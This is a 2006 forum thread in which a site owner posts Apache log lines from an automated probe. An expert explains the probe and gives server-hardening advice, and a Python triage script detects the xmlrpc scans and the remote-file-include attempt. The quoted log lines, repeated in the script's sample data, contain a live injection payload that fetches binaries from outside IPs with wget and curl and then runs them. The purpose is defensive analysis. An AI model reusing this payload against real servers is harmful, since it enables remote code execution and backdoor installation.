TOPIC: Real Life SPAM visit to my Website!

Real Life SPAM visit to my Website! 10 years 7 months ago #14315

These are the details reported by Apache of an unfriendly visit:
Question: What did this ugly citizen try to do?
Did he cause harm? Where is this IP from?
What should be the security procedure to handle this illegal visitor?

[code:1]
200.105.234.43 - - [16/Apr/2006:20:03:50 -0600] "POST /xmlrpc.php HTTP/1.1" 404 295
200.105.234.43 - - [16/Apr/2006:20:03:54 -0600] "POST /blog/xmlrpc.php HTTP/1.1" 404 300
200.105.234.43 - - [16/Apr/2006:20:03:58 -0600] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 307
200.105.234.43 - - [16/Apr/2006:20:04:02 -0600] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 308
200.105.234.43 - - [16/Apr/2006:20:04:08 -0600] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 308
200.105.234.43 - - [16/Apr/2006:20:04:10 -0600] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 305
200.105.234.43 - - [16/Apr/2006:20:04:10 -0600] "POST /drupal/xmlrpc.php HTTP/1.1" 404 302
200.105.234.43 - - [16/Apr/2006:20:04:16 -0600] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 302
200.105.234.43 - - [16/Apr/2006:20:04:17 -0600] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 302
200.105.234.43 - - [16/Apr/2006:20:04:20 -0600] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20ar%20http://207.90.211.54/ar;chmod%20744%20ar;./ar;echo%20YYY;echo| HTTP/1.1" 404 295
200.105.234.43 - - [16/Apr/2006:20:04:23 -0600] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20ar%20http://207.90.211.54/ar;chmod%20744%20ar;./ar;echo%20YYY;echo| HTTP/1.1" 404 294
200.105.234.43 - - [16/Apr/2006:20:04:32 -0600] "POST /xmlrpc.php HTTP/1.1" 404 295
[/code:1]

Re: Real Life SPAM visit to my Website! 10 years 7 months ago #14321

nske (Expert Member)
This was apparently caused by some little program that randomly tried to exploit the php xml-rpc bug through a number of popular scripts. It attempted to download a program uploaded somewhere on the web (probably a backdoor) and execute it. From what appears in the logs, Apache returned a 404 (Not Found) error on all the requests, so nothing happened.

To minimize your exposure to such attacks and their effects, first of all treat the user running Apache as an untrusted user. You should regard every file on the filesystems that Apache has read access to as very likely to be read by an intruder. Unfortunately, some things like database account info need to be accessible; however, try to keep this to a minimum. Similarly, any file or directory that Apache has write access to can allow the intruder to upload a backdoor, and execute permissions can make things easier for him, so be careful with every file's permissions and consider mounting filesystems with the noexec argument. Furthermore, if possible, run Apache in a separate chroot or jail. PHP should run in safe mode, and a few other options definable through php.ini can have an impact on security (they are documented in the official PHP documentation).

Other than that, a well-configured firewall can minimize the chance for a backdoor to work, and some active application-layer monitoring software, like Snort, can detect and block these kinds of attempts. Specifically for Apache, there is also [url=http://www.modsecurity.org]Mod Security[/url] that can serve the same purpose.
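As an added example, not code from this thread or from either poster, here is a small Python triage script that answers the original post's questions ("what did he try to do, did he cause harm, where did the payload come from") by applying the kind of application-layer detection nske mentions for Snort and ModSecurity to the posted log lines. The first three sample lines are copied from the post above with the extraction line breaks removed; the two lines from 192.0.2.7 and 198.51.100.9 are constructed to show a probe that hit an existing xmlrpc.php and an ordinary page view. The function names (`parse_line`, `classify`, `payload_hosts`, `triage`) and the label strings are my own choices.

```python
"""Triage Apache access-log lines for the two probes seen in the post: blind POSTs to
xmlrpc.php and a Mambo/Joomla-style remote file include carrying shell commands in `cmd`."""
import re
from collections import defaultdict
from urllib.parse import unquote, urlsplit

# Apache common log format: ip ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/[\d.]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)$'
)
REMOTE_SCHEME_RE = re.compile(r'^(?:https?|ftp)://', re.I)
FETCH_TOOL_RE = re.compile(r'\b(?:wget|curl|fetch|lynx)\b')
IPV4_RE = re.compile(r'\b\d{1,3}(?:\.\d{1,3}){3}\b')

# Lines 1-3 are copied from the post (line-wrap breaks removed); the last two are constructed
# (documentation address ranges): a probe that hit an existing xmlrpc.php, and a normal page view.
RFI_LINE = (
    '200.105.234.43 - - [16/Apr/2006:20:04:20 -0600] "GET /index2.php?option=com_content'
    '&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS='
    '&mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193'
    '/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20ar%20http://207.90.211.54'
    '/ar;chmod%20744%20ar;./ar;echo%20YYY;echo| HTTP/1.1" 404 295'
)
SAMPLE_LOG = '\n'.join([
    '200.105.234.43 - - [16/Apr/2006:20:03:50 -0600] "POST /xmlrpc.php HTTP/1.1" 404 295',
    '200.105.234.43 - - [16/Apr/2006:20:04:10 -0600] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 305',
    RFI_LINE,
    '192.0.2.7 - - [16/Apr/2006:21:00:00 -0600] "POST /blog/xmlrpc.php HTTP/1.0" 200 512',
    '198.51.100.9 - - [16/Apr/2006:20:05:00 -0600] "GET /index.php?option=com_content&id=1 HTTP/1.1" 200 5120',
])


def parse_query(query):
    """Split on '&' only and percent-decode; the ';' inside `cmd` is the attacker's shell
    separator, not a parameter delimiter, so it must survive intact."""
    params = {}
    for pair in query.split('&'):
        if pair:
            key, _, value = pair.partition('=')
            params[unquote(key)] = unquote(value)
    return params


def parse_line(line):
    """Parse one common-log line into a dict, or return None for anything malformed."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    parts = urlsplit(entry['target'])
    entry['path'] = parts.path
    entry['params'] = parse_query(parts.query)
    entry['status'] = int(entry['status'])
    return entry


def classify(entry):
    """Return the attack labels that apply to one request (empty list if it looks benign)."""
    labels = []
    params = entry['params']
    if entry['method'] == 'POST' and entry['path'].lower().endswith('xmlrpc.php'):
        labels.append('xmlrpc-probe')           # blind scan of well-known xmlrpc.php locations
    if any(REMOTE_SCHEME_RE.match(v) for v in params.values()):
        labels.append('remote-file-include')    # an include/config path pointed at another host
    cmd = params.get('cmd', '')
    if cmd and (';' in cmd or FETCH_TOOL_RE.search(cmd)):
        labels.append('command-injection')      # chained commands that fetch and run a binary
    return labels


def payload_hosts(entry):
    """IPv4 addresses the injected payload would fetch from (include URL and wget/curl targets)."""
    text = ' '.join(entry['params'].values())
    return sorted(set(IPV4_RE.findall(text)) - {entry['ip']})


def triage(log_text):
    """Per source IP: what was attempted, where payloads came from, and whether any hostile
    request reached a real script. A 404 means no such script here, so nothing executed; a 2xx
    only proves the target exists and calls for a look at /tmp, /var/tmp and running processes."""
    report = defaultdict(lambda: {'attempts': defaultdict(int), 'hosts': set(), 'hit': False})
    for line in log_text.splitlines():
        entry = parse_line(line)
        labels = classify(entry) if entry else []
        if not labels:
            continue
        rec = report[entry['ip']]
        for label in labels:
            rec['attempts'][label] += 1
        rec['hosts'].update(payload_hosts(entry))
        rec['hit'] = rec['hit'] or entry['status'] < 400
    return {ip: {'attempts': dict(r['attempts']),
                 'payload_hosts': sorted(r['hosts']),
                 'reached_script': r['hit']}
            for ip, r in report.items()}


if __name__ == '__main__':
    for ip, rec in triage(SAMPLE_LOG).items():
        print(ip, rec)
```

Run against the posted lines, the report for 200.105.234.43 shows the xmlrpc.php scan, one remote file include and one command injection, lists 210.3.4.193, 70.168.74.193 and 207.90.211.54 as the hosts the payload would have been fetched from, and records that no request reached a script, which matches nske's reading that the 404s mean nothing ran. The constructed 192.0.2.7 line shows the opposite case: a 200 on an existing xmlrpc.php does not prove compromise, but it is the case where you would go and check the box rather than just block the IP.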

To Nske 10 years 7 months ago #14322

Thanks Nske.
I will take into consideration, every single word you said.
Thanks again!!!! :o